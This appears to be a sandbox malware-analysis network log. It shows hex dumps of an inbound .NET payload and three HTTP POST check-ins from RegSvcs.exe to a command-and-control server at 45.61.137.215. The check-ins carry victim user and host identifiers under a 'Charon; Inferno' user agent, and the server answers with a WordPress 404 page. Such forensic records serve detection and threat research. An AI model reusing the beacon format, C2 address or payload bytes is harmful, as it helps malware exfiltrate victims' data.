May 29, 2024 15:42:07.743156910 CEST	1236	IN	Data Raw: 6f 38 00 00 0a 00 02 28 2c 00 00 0a 02 7b 0b 00 00 04 6f 38 00 00 0a 00 02 28 2c 00 00 0a 02 7b 0a 00 00 04 6f 38 00 00 0a 00 02 16 1f 32 73 32 00 00 0a 28 69 00 00 0a 00 02 72 11 02 00 70 28 35 00 00 0a 00 02 72 d9 01 00 70 6f 42 00 00 0a 00 02 Data Ascii: o8(,{o8(,{o82s2(irp(5rpoBsC(j{ok{ol(k(l0Ws}X}sm}sm}(rp}rp}rp}
May 29, 2024 15:42:07.743170023 CEST	1236	IN	Data Raw: 0a 00 2a 00 00 00 1b 30 02 00 34 00 00 00 07 00 00 11 00 00 02 7b 1b 00 00 04 28 87 00 00 0a 16 fe 01 0a 06 2c 0e 00 02 7b 1b 00 00 04 28 88 00 00 0a 26 00 00 de 0e 0b 00 07 6f 89 00 00 0a 73 8a 00 00 0a 7a 2a 01 10 00 00 00 00 01 00 24 25 00 0e Data Ascii: 04{(,{(&osz$%%0rpX%rp%(((%rp%(((%rp%(((%rp(I+*rp}r
May 29, 2024 15:42:07.743184090 CEST	1236	IN	Data Raw: 08 09 6e 08 8e 69 6a 5d d4 91 13 0b 11 04 11 0b 58 11 06 09 95 58 20 ff 00 00 00 5f 13 04 20 cc 8e fb 0e 13 0c 11 0c 20 06 8f fb 0e fe 02 13 21 11 21 2c 09 20 c2 8e fb 0e 13 0c 2b 1d 11 0c 20 f8 8e fb 0e fe 02 16 fe 01 13 22 11 22 2c 08 11 0c 17 Data Ascii: nij]XX _ !!, + "",X+##,+%$$,+ %%, + &&,X+ '', + ((,X+
May 29, 2024 15:42:07.743197918 CEST	1236	IN	Data Raw: 5f 6a 61 d2 9c 00 11 4a 17 6a 58 13 4a 11 4a 11 07 8e 69 17 59 6a fe 02 16 fe 01 13 4f 11 4f 3a 76 ff ff ff 02 7b 22 00 00 04 72 cb 01 00 70 6f 42 00 00 0a 00 02 7b 23 00 00 04 1f 0c 1f 0c 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 23 00 00 04 72 d5 Data Ascii: _jaJjXJJiYjOO:v{"rpoB{#s2o3{#rpo5{#2#sUoV{#o{#o{#o{#o{$ M s2o3{$rpo5{$KsUoV{$o7
May 29, 2024 15:42:07.743213892 CEST	1236	IN	Data Raw: 00 0a 28 ae 00 00 0a 13 06 72 a5 0b 00 70 28 ac 00 00 0a 00 28 ad 00 00 0a 28 ae 00 00 0a 13 08 72 db 0b 00 70 28 ac 00 00 0a 00 28 ad 00 00 0a 28 ae 00 00 0a 13 07 00 72 68 08 00 70 0b 07 73 af 00 00 0a 13 09 11 09 6f b0 00 00 0a 00 72 0d 0c 00 Data Ascii: (rp(((rp(((rhpsorp(X%r3p%(%rp%%rp%%rp%%rp%%rp%(%rp%(%rp%(%rp%(
May 29, 2024 15:42:07.747870922 CEST	1236	IN	Data Raw: 04 6f b2 00 00 0a 72 72 12 00 70 08 6f b3 00 00 0a 26 73 b4 00 00 0a 13 05 11 04 73 b5 00 00 0a 13 06 11 06 11 05 6f b6 00 00 0a 26 06 6f b7 00 00 0a 00 11 05 6f b8 00 00 0a 6f b9 00 00 0a 16 31 1c 11 05 6f b8 00 00 0a 16 6f ba 00 00 0a 6f bb 00 Data Ascii: orrpo&sso&ooo1oooo+9D(r~p(4(rhpsorpsorrpo&o8/rp(X%rp%o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49712	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:10.038269997 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 172 Connection: close
May 29, 2024 15:42:10.043184042 CEST	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rutina528110TINA-PCk0FDD42EE188E931437F4FBE2CETozH
May 29, 2024 15:42:12.499260902 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:10 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:12.499285936 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:12.499311924 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:12.499326944 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:12.499351978 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:42:12.499366999 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:12.499391079 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:12.499403954 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:42:12.499419928 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:42:12.499774933 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49714	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:12.652340889 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 172 Connection: close
May 29, 2024 15:42:12.657429934 CEST	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rutina528110TINA-PC+0FDD42EE188E931437F4FBE2ClmHmF
May 29, 2024 15:42:15.220684052 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:13 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:15.220729113 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:42:15.221035004 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:42:15.221084118 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 29, 2024 15:42:15.221096992 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:42:15.221127987 CEST	224	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !impo
May 29, 2024 15:42:15.221138000 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:42:15.221158981 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:42:15.221175909 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:15.221185923 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49715	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:15.295733929 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:15.300714016 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:17.733454943 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:15 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:17.733470917 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:42:17.733504057 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:42:17.733521938 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
